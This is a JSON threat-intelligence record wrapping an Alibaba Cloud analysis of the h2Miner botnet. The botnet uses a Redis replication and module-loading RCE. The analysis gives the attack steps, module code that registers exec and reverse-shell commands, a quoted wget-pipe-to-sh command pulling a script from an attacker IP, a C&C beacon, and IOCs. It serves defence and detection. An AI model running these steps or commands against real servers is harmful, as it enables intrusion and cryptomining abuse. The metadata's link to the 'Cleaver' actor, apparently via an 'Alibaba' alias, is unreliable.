{
	"id": "1a68a49d-ac47-4fc9-8d1c-4dff68e23df2",
	"created_at": "2026-04-06T00:11:20.313588Z",
	"updated_at": "2026-04-10T13:12:31.912138Z",
	"deleted_at": null,
	"sha1_hash": "f8844496106c0bc3ca8793e9972a534742c1f827",
	"title": "New Outbreak of h2Miner Worms Exploiting Redis RCE Detected",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 646759,
	"plain_text": "New Outbreak of h2Miner Worms Exploiting Redis RCE Detected\r\nArchived: 2026-04-05 12:53:47 UTC\r\nIn this post, we'll discuss the recent outbreak of h2Miner worms, which exploit Redis's Remote Command\r\nExecution (RCE), and also share some useful security tips from the Alibaba Cloud Security team.\r\nBy Cang Po, with special thanks to Sang Duo.\r\nhttps://www.alibabacloud.com/blog/new-outbreak-of-h2miner-worms-exploiting-redis-rce-detected_595743\r\nPage 1 of 8\n\nRecently, Alibaba Cloud's security team detected a sudden outbreak of h2Miner mining botnet worms. This type\r\nof malicious worm uses unauthorized access to Redis or weak Redis passwords as its gateway into your systems, then\r\nsynchronizes its own malicious module from an associated server controlled by the attacker through master-slave replication,\r\nand finally loads this malicious module on the target machine and executes malicious instructions.\r\nIn the past, attacks on such systems were mainly carried out by writing scheduled tasks or SSH\r\nkeys to the target machine after the attacker logged in to Redis. 
Fortunately, this method often\r\nfails to penetrate the system because of permission controls or differences between system versions.\r\nThe module-loading method, however, can directly execute arbitrary instructions or obtain an interactive shell\r\nenvironment, which is harmful to your system.\r\nDue to the large number of Redis instances hosted online (nearly 1 million), Alibaba Cloud's security team, as a\r\nfriendly reminder to our customers, recommends that users do not expose their Redis service to the public network,\r\ncheck the strength of their passwords regularly, and check in a timely manner whether they have been affected by\r\nthe worm.\r\nOf course, another effective means of protecting your systems is to purchase some of the relevant security\r\nproducts and services from Alibaba Cloud's large portfolio of security products and solutions to prevent further\r\nmalicious attacks. Some of our most popular products include our Anti-DDoS product packages, such as Anti-DDoS Basic, Anti-DDoS Pro and Anti-DDoS Premium, as well as our Web Application Firewall. You\r\ncan contact our sales team to learn which security products are suitable for your needs.\r\nH2Miner Gang\r\nh2Miner is a Linux mining botnet that can invade your system through various means, including\r\nthe Hadoop Yarn unauthorized-access vulnerability, unauthorized access to the Docker Remote API, and\r\nRedis's Remote Command Execution (RCE) vulnerability. The botnet works by downloading malicious\r\nscripts and malicious mining programs, scanning horizontally to expand its attack surface, and\r\nmaintaining Command and Control (C\u0026C) communication.\r\nRedis RCE\r\nKnowledge of this issue was shared by Pavel Toporkov at ZeroNights 2018. 
After version 4.0, Redis supports\r\nloading external modules, which lets users load .so files compiled from C into\r\nRedis to implement custom Redis commands. This function, although useful, introduced a vulnerability: in\r\nRedis master-slave mode, files can be synchronized to the slave through the fullresync mechanism, which completes the\r\ntransmission of a malicious .so file. After completing the transfer, the attacker loads the module on the target Redis and\r\nexecutes arbitrary instructions.\r\nWorm Analysis\r\nRecently, the Alibaba Cloud security team discovered that the size of the h2Miner group suddenly increased\r\nsharply. According to their analysis, the overall process of an attack is as follows:\r\nh2Miner mainly uses Redis's RCE to complete the intrusion. First, attackers use unauthorized access or weak passwords\r\nto gain access to Redis servers. Then, they use config set dbfilename red2.so to modify the save file name.\r\nAfter that, attackers use the slaveof command to set the host address for master-slave replication. When the\r\ntarget Redis service establishes a master-slave connection with the malicious Redis service owned by the attacker,\r\nthe attacker controls the malicious Redis to send a fullresync command for file synchronization, after which the\r\nred2.so file is written on the target machine. After this, attackers use module load ./red2.so to load this\r\n.so file. 
This module can execute arbitrary instructions or initiate a reverse connection to obtain a shell\r\nenvironment, depending on the parameters passed in.\r\n if (RedisModule_CreateCommand(ctx, \"system.exec\",\r\n DoCommand, \"readonly\", 1, 1, 1) == REDISMODULE_ERR)\r\n return REDISMODULE_ERR;\r\n if (RedisModule_CreateCommand(ctx, \"system.rev\",\r\n RevShellCommand, \"readonly\", 1, 1, 1) == REDISMODULE_ERR)\r\n return REDISMODULE_ERR;\r\nAfter executing a malicious instruction such as /bin/sh -c wget -q -O- http://195.3.146.118/unk.sh | sh \u003e/dev/null 2\u003e\u00261, the attacker resets the backup file name and uses module unload to unload the system\r\nmodule to clear the corresponding traces. However, the red2.so file still remains on the attacked host. Users are\r\nadvised to check whether such a suspicious file is present in their Redis service directory.\r\nIn addition to killing some other malicious processes to take their resources, the malicious script follows up by\r\ndownloading and running a malicious binary from http://142.44.191.122/kinsing. This means that a process\r\nname or directory name containing kinsing on the host may indicate that the machine has been infected by the\r\nworm.\r\nAccording to the results of a simple reverse analysis, the malicious program mainly has the following functions:\r\nDownload the file and execute it\r\nExecute the mining program\r\nMaintain C\u0026C communication and execute commands\r\n
Use masscan to scan externally to expand its reach. In addition, the IP address of the C\u0026C server is hard-coded in the program, and the affected host communicates with the C\u0026C server over\r\nHTTP, where information about the zombie (hacked server) is carried in the HTTP headers.\r\nGET /h HTTP/1.1\r\nHost: 91.215.169.111\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.10\r\nArch: amd64\r\nCores: 2\r\nMem: 3944\r\nOs: linux\r\nOsname: debian\r\nOsversion: 10.0\r\nRoot: false\r\nS: k\r\nUuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx\r\nVersion: 26\r\nAccept-Encoding: gzip\r\nOther Attack Methods\r\n1. Solr dataimport RCE (CVE-2019-0193)\r\n2. Hadoop Yarn REST API Unauthorized RCE (CVE-2017-15718)\r\n3. Docker Remote API Unauthorized RCE\r\n4. ThinkPHP5 Global Variable Override RCE\r\n5. Confluence Unauthorized RCE (CVE-2019-3396)\r\nIOC\r\n/kinsing\r\n142.44.191.122/t.sh\r\n185.92.74.42/h.sh\r\n142.44.191.122/spr.sh\r\n142.44.191.122/spre.sh\r\n195.3.146.118/unk.sh\r\nC\u0026C\r\n45.10.88.102\r\n91.215.169.111\r\n139.99.50.255\r\n46.243.253.167\r\n195.123.220.193\r\nSecurity Advice\r\nTo our customers, we have the following recommendations. First, Redis should not be exposed to the Internet and\r\nshould be secured with a strong password. 
Next, it is important that customers check whether the red2.so file has been left\r\nin the Redis path or whether any file name or process name on the host contains kinsing.\r\nSource: https://www.alibabacloud.com/blog/new-outbreak-of-h2miner-worms-exploiting-redis-rce-detected_595743",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.alibabacloud.com/blog/new-outbreak-of-h2miner-worms-exploiting-redis-rce-detected_595743"
	],
	"report_names": [
		"new-outbreak-of-h2miner-worms-exploiting-redis-rce-detected_595743"
	],
	"threat_actors": [
		{
			"id": "3fff98c9-ad02-401d-9d4b-f78b5b634f31",
			"created_at": "2023-01-06T13:46:38.376868Z",
			"updated_at": "2026-04-10T02:00:02.949077Z",
			"deleted_at": null,
			"main_name": "Cleaver",
			"aliases": [
				"G0003",
				"Operation Cleaver",
				"Op Cleaver",
				"Tarh Andishan",
				"Alibaba",
				"TG-2889",
				"Cobalt Gypsy"
			],
			"source_name": "MISPGALAXY:Cleaver",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "a6c351ea-01f1-4c9b-af75-cfbb3b269ed3",
			"created_at": "2023-01-06T13:46:39.390649Z",
			"updated_at": "2026-04-10T02:00:03.311299Z",
			"deleted_at": null,
			"main_name": "Kinsing",
			"aliases": [
				"Money Libra"
			],
			"source_name": "MISPGALAXY:Kinsing",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434280,
	"ts_updated_at": 1775826751,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f8844496106c0bc3ca8793e9972a534742c1f827.pdf",
		"text": "https://archive.orkl.eu/f8844496106c0bc3ca8793e9972a534742c1f827.txt",
		"img": "https://archive.orkl.eu/f8844496106c0bc3ca8793e9972a534742c1f827.jpg"
	}
}